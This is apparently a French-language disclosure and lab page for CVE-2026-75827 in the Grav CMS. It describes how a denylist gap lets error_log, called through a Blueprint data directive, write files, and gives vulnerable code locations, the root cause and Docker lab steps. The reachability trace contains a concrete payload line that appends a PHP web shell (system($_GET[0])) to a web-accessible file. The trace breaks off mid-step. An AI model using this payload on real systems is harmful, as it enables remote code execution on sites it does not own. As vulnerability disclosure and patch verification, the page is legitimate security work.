
Preuve de concept et labo pour CVE-2026-75827, une écriture de fichier arbitraire dans Grav via error_log de données dynamiques Blueprint, avec script de reproduction et labo Docker.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-75827
grav 2.0.13 — getgrav
Grav avant 2.0.15 contient une vulnérabilité d'écriture arbitraire de fichier dans la validation des fonctions nues des données dynamiques des Blueprints, qui utilise une liste de refus incomplète au lieu d'une liste d'autorisation positive. Les attaquants disposant d'un accès d'édition de page ou de configuration de blueprint peuvent invoquer la fonction error_log via une directive de données pour ajouter des charges utiles PHP à des fichiers accessibles par le web, permettant ainsi l'exécution de code à distance.
| CVE | CVE-2026-75827 · CVE.org |
| CWE | CWE-94 |
| CVSS | Élevé : 8.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| Produit | grav |
| Affecté | toutes les versions jusqu'à 2.0.13 (incluse) |
| Corrigé | 2.0.15 et ultérieures |
| Auth | aucune (voir la cartographie des sources) |
| Lab | 127.0.0.1 uniquement · pack de divulgation fournisseur/client, pas un scanner |
L'écriture arbitraire de fichier se fait via error_log par le biais de data-options@ dans un blueprint de formulaire, et non par une action d'upload=. Le HTTP est GET /poc-form puis GET /poc-witness.txt.
GET/poc-formSeed du lab : utilisateur admin + plugin Form + page 03.poc-form avec data-options@: error_logGET /poc-form → Form::getBlueprint() → Blueprint::dynamicData → isSafeDynamicCall('error_log') true → error_log(witness, 3, poc-witness.txt)GET /poc-witness.txt → POCWitness75827Le corps de GET /poc-witness.txt contient POCWitness75827. Le HTML de la page d'accueil ou un 404 vide n'est pas le témoin d'écriture de fichier.
À faire en premier : Mettre à jour grav vers 2.0.15 ou une version plus récente.
Vérifier après la mise à jour
CVE-2026-75827-Abraxas-Labs.py contre la version corrigée : le témoin cartographié ne doit pas apparaître.Si vous ne pouvez pas mettre à jour immédiatement
Ciblez uniquement http://127.0.0.1:8088 (ou le loopback que vous avez lié). Ne pointez pas ce script vers Internet.
python3 CVE-2026-75827-Abraxas-Labs.py
Le succès correspond au témoin ci-dessus dans le corps de la réponse. Un HTML 200 générique ne l'est pas.
Pile loopback utilisée pour la reproduction. Images officielles sauf si un Dockerfile dans ce dossier construit depuis les sources.
cd lab
docker compose up --force-recreate
Liez l'arborescence du produit vulnérable à côté de Compose si le YAML monte un répertoire local (zip du plugin / tag source issu du tableau des versions). Ne publiez rien d'autre que 127.0.0.1.
# CVE-2026-75827 (structured records)
- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-75827`
- CWE: CWE-94
- published: 2026-08-18T12:19:32.553
## NVD description
Grav before 2.0.15 contains an arbitrary file write vulnerability in the Blueprint dynamic-data bare-function validation that uses an incomplete denylist instead of a positive allowlist. Attackers with page-edit or blueprint-config access can invoke the error_log function through a data directive to append PHP payloads to web-accessible files, achieving remote code execution.
## MITRE description
Grav before 2.0.15 contains an arbitrary file write vulnerability in the Blueprint dynamic-data bare-function validation that uses an incomplete denylist instead of a positive allowlist. Attackers with page-edit or blueprint-config access can invoke the error_log function through a data directive to append PHP payloads to web-accessible files, achieving remote code execution.
## Affected
- getgrav grav 0 affected, 2.0.15 unaffected
- OSV:
## References (JSON sources only)
- https://github.com/getgrav/grav/security/advisories/GHSA-f8wv-xp27-6gq7
- https://www.vulncheck.com/advisories/grav-before-arbitrary-file-write-via-error-log
- https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/75xxx/CVE-2026-75827.json
- https://nvd.nist.gov/vuln/detail/CVE-2026-75827
- https://github.com/advisories/GHSA-f8wv-xp27-6gq7
## GitHub advisory
Grav: Blueprint dynamic-data bare-function branch is denylist-gated and omits error_log, giving arbitrary file write
## Affected versions and vulnerable location
- Confirmed on grav core at `78ebfc1` (tag 2.0.13).
- Sinks:
- `system/src/Grav/Common/Data/Blueprint.php:455-458` `call_user_func_array($o, $params)` (bare-function dynamic-data provider).
- Twin: `system/src/Grav/Framework/Flex/FlexDirectory.php:936-938` `call_user_func_array($function, $params)`.
- Validation gate: `Blueprint::isSafeDynamicCall()` at `Blueprint.php:514-536`.
- `Class::method` branch (`:514-527`) uses a strict positive allowlist `self::$allowedDynamicCallables`.
- Bare-function branch (`:530-534`) uses only a denylist: `if (is_string($function) && Utils::isDangerousFunction($function)) return false; return !self::paramsContainDangerousCallable($params);`.
- Denylist: `Utils::isDangerousFunction()` (`system/src/Grav/Common/Utils.php`, list around `:2020-2270`).
## Root cause
GHSA-7pgq/CVE-2026-64850 hardened the `Class::method` half of the dynamic-callable validation to a positive allowlist because a page-edit account could otherwise name any static method as a provider and reach file/secret gadgets. The bare-function half was left on a denylist (`isDangerousFunction`). Any bare PHP function not on that list executes.
`error_log` is not on the denylist (verified: no occurrence in `Utils.php`). `error_log($message, 3, $destination)` appends attacker-controlled `$message` to attacker-controlled file `$destination`, an arbitrary-file-append primitive. `paramsContainDangerousCallable()` (`:587-603`) only scans params for dangerous callable strings, so a PHP payload string and a destination path both pass. (`stream_socket_client`, `dl`, and `mb_send_mail` are likewise absent, giving SSRF/other primitives.)
## Attacker model
The same surface the published dynamic-data advisories accept as reachable: a `data-*@` directive in a form blueprint the Form plugin assembles from page frontmatter (GHSA-fj2p), or a `data@` field in a Flex directory/pages/users blueprint (GHSA-c4wf). A page-edit / blueprint-config account, no shell.
## Reachability trace
1. Author a blueprint field with a bare-function data directive, e.g.
`data-options@: ['error_log', '<?php system($_GET[0]); ?>', 3, 'user/data/x.php']`.
2. `Blueprint::init()` resolves the directive; `isSafeDynamicCall('error_log', $params)` reaches the bare-function branch (`:530`), `isDangerousFunction('error_log')` is false, `paramsContainDangerousCallable([...])` is false (no callable strings),
Ce pack est destiné au fournisseur, au propriétaire du site et aux labs sous licence. Le script communique avec 127.0.0.1. L'utiliser contre des systèmes que vous ne possédez pas n'est pas autorisé par Abraxas Labs. Aucune garantie.